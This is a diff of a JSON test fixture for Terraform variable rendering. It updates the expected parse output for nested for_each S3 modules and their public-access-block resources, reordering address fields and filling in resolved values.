 "module": [
 {
 "s3_module[\"a\"]": {
+ "__address__": "s3_module[\"a\"]",
 "__end_line__": 12,
 "__resolved__": [
 "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"a\", \"nested_tf_module\": null}}"
@@ -16,12 +17,12 @@
 ],
 "source": [
 "./module"
- ],
- "__address__": "s3_module[\"a\"]"
+ ]
 }
 },
 {
 "s3_module2[0]": {
+ "__address__": "s3_module2[0]",
 "__end_line__": 19,
 "__resolved__": [
 "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 0, \"nested_tf_module\": null}}"
@@ -35,12 +36,12 @@
 ],
 "source": [
 "./module"
- ],
- "__address__": "s3_module2[0]"
+ ]
 }
 },
 {
 "s3_module[\"b\"]": {
+ "__address__": "s3_module[\"b\"]",
 "__end_line__": 12,
 "__resolved__": [
 "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"b\", \"nested_tf_module\": null}}"
@@ -54,12 +55,12 @@
 ],
 "source": [
 "./module"
- ],
- "__address__": "s3_module[\"b\"]"
+ ]
 }
 },
 {
 "s3_module2[1]": {
+ "__address__": "s3_module2[1]",
 "__end_line__": 19,
 "__resolved__": [
 "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 1, \"nested_tf_module\": null}}"
@@ -73,14 +74,14 @@
 ],
 "source": [
 "./module"
- ],
- "__address__": "s3_module2[1]"
+ ]
 }
 }
 ],
 "provider": [
 {
 "aws": {
+ "__address__": "aws.test_provider",
 "__end_line__": 5,
 "__start_line__": 1,
 "alias": [
@@ -91,8 +92,7 @@
 ],
 "test_provider": [
 true
- ],
- "__address__": "aws.test_provider"
+ ]
 }
 }
 ]
@@ -101,88 +101,178 @@ "module": [ { "inner_s3_module[\"c\"]": { + "__address__": "module.s3_module[\"a\"].inner_s3_module[\"c\"]", "__end_line__": 5, "__resolved__": [ - "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"a\", \"nested_tf_module\": null}}}" + "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": \"c\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"a\", \"nested_tf_module\": null}}}" + ], + "__start_line__": 1, + "bucket2": [ + false + ], + "source": [ + "./module2" + ] + } + }, + { + "inner_s3_module2[\"e\"]": { + "__address__": "module.s3_module[\"a\"].inner_s3_module2[\"e\"]", + "__end_line__": 11, + "__resolved__": [ + "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module2\", \"foreach_idx\": \"e\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"a\", \"nested_tf_module\": null}}}" + ], 
+ "__start_line__": 7, + "bucket2": [ + "" + ], + "source": [ + "./module2" + ] + } + }, + { + "inner_s3_module[\"d\"]": { + "__address__": "module.s3_module[\"a\"].inner_s3_module[\"d\"]", + "__end_line__": 5, + "__resolved__": [ + "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": \"d\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"a\", \"nested_tf_module\": null}}}" ], "__start_line__": 1, "bucket2": [ - "var.bucket" + false ], "source": [ "./module2" + ] + } + }, + { + "inner_s3_module2[\"f\"]": { + "__address__": "module.s3_module[\"a\"].inner_s3_module2[\"f\"]", + "__end_line__": 11, + "__resolved__": [ + "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module2\", \"foreach_idx\": \"f\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"a\", \"nested_tf_module\": null}}}" ], - "__address__": "module.s3_module[\"a\"].inner_s3_module[\"c\"]" + "__start_line__": 7, + "bucket2": [ + "" + ], + "source": [ + "./module2" + ] + } + } + ], + "variable": [ + { + "bucket": { + "__address__": "module.s3_module[\"a\"].bucket", + "__end_line__": 16, + "__start_line__": 14, + "type": [ + "string" + ] + } + }, + { + "bucket2": { + "__address__": "module.s3_module[\"a\"].bucket2", + "__end_line__": 20, + "__start_line__": 18, + "type": [ + 
"string" + ] + } + } + ] + }, + "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"b\", \"nested_tf_module\": null}}": { + "module": [ + { + "inner_s3_module[\"c\"]": { + "__address__": "module.s3_module[\"b\"].inner_s3_module[\"c\"]", + "__end_line__": 5, + "__resolved__": [ + "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"a\", \"nested_tf_module\": null}}}" + ], + "__start_line__": 1, + "bucket2": [ + false + ], + "source": [ + "./module2" + ] } }, { "inner_s3_module2[\"e\"]": { + "__address__": "module.s3_module[\"b\"].inner_s3_module2[\"e\"]", "__end_line__": 11, "__resolved__": [ "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module2\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"a\", \"nested_tf_module\": null}}}" ], "__start_line__": 7, "bucket2": [ - "var.bucket2" + "" ], "source": [ "./module2" - ], - "__address__": "module.s3_module[\"a\"].inner_s3_module2[\"e\"]" + ] } }, { "inner_s3_module[\"d\"]": { + 
"__address__": "module.s3_module[\"b\"].inner_s3_module[\"d\"]", "__end_line__": 5, "__resolved__": [ "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"a\", \"nested_tf_module\": null}}}" ], "__start_line__": 1, "bucket2": [ - "var.bucket" + false ], "source": [ "./module2" - ], - "__address__": "module.s3_module[\"a\"].inner_s3_module[\"d\"]" + ] } }, { "inner_s3_module2[\"f\"]": { + "__address__": "module.s3_module[\"b\"].inner_s3_module2[\"f\"]", "__end_line__": 11, "__resolved__": [ "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module2\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"a\", \"nested_tf_module\": null}}}" ], "__start_line__": 7, "bucket2": [ - "var.bucket2" + "" ], "source": [ "./module2" - ], - "__address__": "module.s3_module[\"a\"].inner_s3_module2[\"f\"]" + ] } } ], "variable": [ { "bucket": { + "__address__": "module.s3_module[\"b\"].bucket", "__end_line__": 16, "__start_line__": 14, "type": [ "string" - ], - "__address__": "module.s3_module[\"a\"].bucket" + ] } }, { "bucket2": { + "__address__": "module.s3_module[\"b\"].bucket2", "__end_line__": 20, "__start_line__": 18, "type": [ "string" - ], - "__address__": 
"module.s3_module[\"a\"].bucket2" + ] } } ] 
@@ -191,88 +281,178 @@ "module": [ { "inner_s3_module[\"c\"]": { + "__address__": "module.s3_module2[0].inner_s3_module[\"c\"]", "__end_line__": 5, "__resolved__": [ - "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 0, \"nested_tf_module\": null}}}" + "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": \"c\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 0, \"nested_tf_module\": null}}}" + ], + "__start_line__": 1, + "bucket2": [ + "" + ], + "source": [ + "./module2" + ] + } + }, + { + "inner_s3_module2[\"e\"]": { + "__address__": "module.s3_module2[0].inner_s3_module2[\"e\"]", + "__end_line__": 11, + "__resolved__": [ + "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module2\", \"foreach_idx\": \"e\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 0, \"nested_tf_module\": null}}}" + ], + 
"__start_line__": 7, + "bucket2": [ + true + ], + "source": [ + "./module2" + ] + } + }, + { + "inner_s3_module[\"d\"]": { + "__address__": "module.s3_module2[0].inner_s3_module[\"d\"]", + "__end_line__": 5, + "__resolved__": [ + "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": \"d\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 0, \"nested_tf_module\": null}}}" ], "__start_line__": 1, "bucket2": [ - "var.bucket" + "" + ], + "source": [ + "./module2" + ] + } + }, + { + "inner_s3_module2[\"f\"]": { + "__address__": "module.s3_module2[0].inner_s3_module2[\"f\"]", + "__end_line__": 11, + "__resolved__": [ + "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module2\", \"foreach_idx\": \"f\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 0, \"nested_tf_module\": null}}}" + ], + "__start_line__": 7, + "bucket2": [ + true ], "source": [ "./module2" + ] + } + } + ], + "variable": [ + { + "bucket": { + "__address__": "module.s3_module2[0].bucket", + "__end_line__": 16, + "__start_line__": 14, + "type": [ + "string" + ] + } + }, + { + "bucket2": { + "__address__": "module.s3_module2[0].bucket2", + "__end_line__": 20, + "__start_line__": 18, + "type": [ + "string" + ] + } + } + ] + }, + "{\"file_path\": 
\".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 1, \"nested_tf_module\": null}}": { + "module": [ + { + "inner_s3_module[\"c\"]": { + "__address__": "module.s3_module2[1].inner_s3_module[\"c\"]", + "__end_line__": 5, + "__resolved__": [ + "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 0, \"nested_tf_module\": null}}}" ], - "__address__": "module.s3_module2[0].inner_s3_module[\"c\"]" + "__start_line__": 1, + "bucket2": [ + "" + ], + "source": [ + "./module2" + ] } }, { "inner_s3_module2[\"e\"]": { + "__address__": "module.s3_module2[1].inner_s3_module2[\"e\"]", "__end_line__": 11, "__resolved__": [ "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module2\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 0, \"nested_tf_module\": null}}}" ], "__start_line__": 7, "bucket2": [ - "var.bucket2" + true ], "source": [ "./module2" - ], - "__address__": "module.s3_module2[0].inner_s3_module2[\"e\"]" + ] } }, { "inner_s3_module[\"d\"]": { + 
"__address__": "module.s3_module2[1].inner_s3_module[\"d\"]", "__end_line__": 5, "__resolved__": [ "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 0, \"nested_tf_module\": null}}}" ], "__start_line__": 1, "bucket2": [ - "var.bucket" + "" ], "source": [ "./module2" - ], - "__address__": "module.s3_module2[0].inner_s3_module[\"d\"]" + ] } }, { "inner_s3_module2[\"f\"]": { + "__address__": "module.s3_module2[1].inner_s3_module2[\"f\"]", "__end_line__": 11, "__resolved__": [ "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module2\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 0, \"nested_tf_module\": null}}}" ], "__start_line__": 7, "bucket2": [ - "var.bucket2" + true ], "source": [ "./module2" - ], - "__address__": "module.s3_module2[0].inner_s3_module2[\"f\"]" + ] } } ], "variable": [ { "bucket": { + "__address__": "module.s3_module2[1].bucket", "__end_line__": 16, "__start_line__": 14, "type": [ "string" - ], - "__address__": "module.s3_module2[0].bucket" + ] } }, { "bucket2": { + "__address__": "module.s3_module2[1].bucket2", "__end_line__": 20, "__start_line__": 18, "type": [ "string" - ], - "__address__": "module.s3_module2[0].bucket2" + ] } } ] 
@@ -280,17 +460,19 @@ "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": \"c\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"a\", \"nested_tf_module\": null}}}": { "locals": [ { + "__address__": "module.s3_module[\"a\"].module.inner_s3_module[\"c\"].bucket2", "bucket2": [ - "var.bucket2" - ], - "__address__": "module.s3_module[\"a\"].module.inner_s3_module[\"c\"].bucket2" + false + ] } ], "resource": [ { "aws_s3_bucket_public_access_block": { "var_bucket": { + "__address__": "module.s3_module[\"a\"].module.inner_s3_module[\"c\"].aws_s3_bucket_public_access_block.var_bucket", "__end_line__": 11, + "__provider_address__": "", "__start_line__": 5, "block_public_acls": [ true @@ -299,15 +481,14 @@ true ], "bucket": [ - "var.bucket2" + false ], "ignore_public_acls": [ true ], "restrict_public_buckets": [ true - ], - "__address__": "module.s3_module[\"a\"].module.inner_s3_module[\"c\"].aws_s3_bucket_public_access_block.var_bucket" + ] } } } 
@@ -315,30 +496,32 @@ "variable": [ { "bucket2": { + "__address__": "module.s3_module[\"a\"].module.inner_s3_module[\"c\"].bucket2", "__end_line__": 16, "__start_line__": 14, "type": [ "string" - ], - "__address__": "module.s3_module[\"a\"].module.inner_s3_module[\"c\"].bucket2" + ] } } ] }, - "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": \"c\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 0, \"nested_tf_module\": null}}}": { + "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": \"c\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"b\", \"nested_tf_module\": null}}}": { "locals": [ { + "__address__": "module.s3_module[\"b\"].module.inner_s3_module[\"c\"].bucket2", "bucket2": [ - "var.bucket2" - ], - "__address__": "module.s3_module2[0].module.inner_s3_module[\"c\"].bucket2" + false + ] } ], "resource": [ { "aws_s3_bucket_public_access_block": { "var_bucket": { + "__address__": "module.s3_module[\"b\"].module.inner_s3_module[\"c\"].aws_s3_bucket_public_access_block.var_bucket", "__end_line__": 11, + "__provider_address__": "", "__start_line__": 5, "block_public_acls": [ true 
@@ -347,15 +530,14 @@ true ], "bucket": [ - "var.bucket2" + false ], "ignore_public_acls": [ true ], "restrict_public_buckets": [ true - ], - "__address__": "module.s3_module2[0].module.inner_s3_module[\"c\"].aws_s3_bucket_public_access_block.var_bucket" + ] } } } 
@@ -363,30 +545,32 @@ "variable": [ { "bucket2": { + "__address__": "module.s3_module[\"b\"].module.inner_s3_module[\"c\"].bucket2", "__end_line__": 16, "__start_line__": 14, "type": [ "string" - ], - "__address__": "module.s3_module2[0].module.inner_s3_module[\"c\"].bucket2" + ] } } ] }, - "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module2\", \"foreach_idx\": \"e\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"a\", \"nested_tf_module\": null}}}": { + "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": \"c\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 0, \"nested_tf_module\": null}}}": { "locals": [ { + "__address__": "module.s3_module2[0].module.inner_s3_module[\"c\"].bucket2", "bucket2": [ - "var.bucket2" - ], - "__address__": "module.s3_module[\"a\"].module.inner_s3_module2[\"e\"].bucket2" + "" + ] } ], "resource": [ { "aws_s3_bucket_public_access_block": { "var_bucket": { + "__address__": "module.s3_module2[0].module.inner_s3_module[\"c\"].aws_s3_bucket_public_access_block.var_bucket", "__end_line__": 11, + "__provider_address__": "", "__start_line__": 5, "block_public_acls": [ true 
@@ -395,15 +579,14 @@ true ], "bucket": [ - "var.bucket2" + "" ], "ignore_public_acls": [ true ], "restrict_public_buckets": [ true - ], - "__address__": "module.s3_module[\"a\"].module.inner_s3_module2[\"e\"].aws_s3_bucket_public_access_block.var_bucket" + ] } } } 
@@ -411,30 +594,32 @@ "variable": [ { "bucket2": { + "__address__": "module.s3_module2[0].module.inner_s3_module[\"c\"].bucket2", "__end_line__": 16, "__start_line__": 14, "type": [ "string" - ], - "__address__": "module.s3_module[\"a\"].module.inner_s3_module2[\"e\"].bucket2" + ] } } ] }, - "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module2\", \"foreach_idx\": \"e\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 0, \"nested_tf_module\": null}}}": { + "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": \"c\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 1, \"nested_tf_module\": null}}}": { "locals": [ { + "__address__": "module.s3_module2[1].module.inner_s3_module[\"c\"].bucket2", "bucket2": [ - "var.bucket2" - ], - "__address__": "module.s3_module2[0].module.inner_s3_module2[\"e\"].bucket2" + "" + ] } ], "resource": [ { "aws_s3_bucket_public_access_block": { "var_bucket": { + "__address__": "module.s3_module2[1].module.inner_s3_module[\"c\"].aws_s3_bucket_public_access_block.var_bucket", "__end_line__": 11, + "__provider_address__": "", "__start_line__": 5, "block_public_acls": [ true 
@@ -443,15 +628,14 @@ true ], "bucket": [ - "var.bucket2" + "" ], "ignore_public_acls": [ true ], "restrict_public_buckets": [ true - ], - "__address__": "module.s3_module2[0].module.inner_s3_module2[\"e\"].aws_s3_bucket_public_access_block.var_bucket" + ] } } } 
@@ -459,147 +643,32 @@ "variable": [ { "bucket2": { + "__address__": "module.s3_module2[1].module.inner_s3_module[\"c\"].bucket2", "__end_line__": 16, "__start_line__": 14, "type": [ "string" - ], - "__address__": "module.s3_module2[0].module.inner_s3_module2[\"e\"].bucket2" + ] } } ] }, - "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/variable.tf\", \"tf_source_modules\": null}": { - "variable": [ - { - "count_var": { - "__end_line__": 4, - "__start_line__": 2, - "default": [ - 2 - ], - "__address__": "count_var" - } - }, - { - "foreach_var": { - "__end_line__": 8, - "__start_line__": 6, - "default": [ - [ - "a", - "b" - ] - ], - "__address__": "foreach_var" - } - } - ] - }, - "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"b\", \"nested_tf_module\": null}}": { - "module": [ - { - "inner_s3_module[\"c\"]": { - "__end_line__": 5, - "__resolved__": [ - "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"a\", \"nested_tf_module\": null}}}" - ], - "__start_line__": 1, - "bucket2": [ - "var.bucket" - ], - "source": [ - "./module2" - ], - "__address__": "module.s3_module[\"b\"].inner_s3_module[\"c\"]" - } - }, - { - "inner_s3_module2[\"e\"]": { - "__end_line__": 11, - "__resolved__": [ - "{\"file_path\": 
\".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module2\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"a\", \"nested_tf_module\": null}}}" - ], - "__start_line__": 7, - "bucket2": [ - "var.bucket2" - ], - "source": [ - "./module2" - ], - "__address__": "module.s3_module[\"b\"].inner_s3_module2[\"e\"]" - } - }, - { - "inner_s3_module[\"d\"]": { - "__end_line__": 5, - "__resolved__": [ - "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"a\", \"nested_tf_module\": null}}}" - ], - "__start_line__": 1, - "bucket2": [ - "var.bucket" - ], - "source": [ - "./module2" - ], - "__address__": "module.s3_module[\"b\"].inner_s3_module[\"d\"]" - } - }, - { - "inner_s3_module2[\"f\"]": { - "__end_line__": 11, - "__resolved__": [ - "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module2\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": 
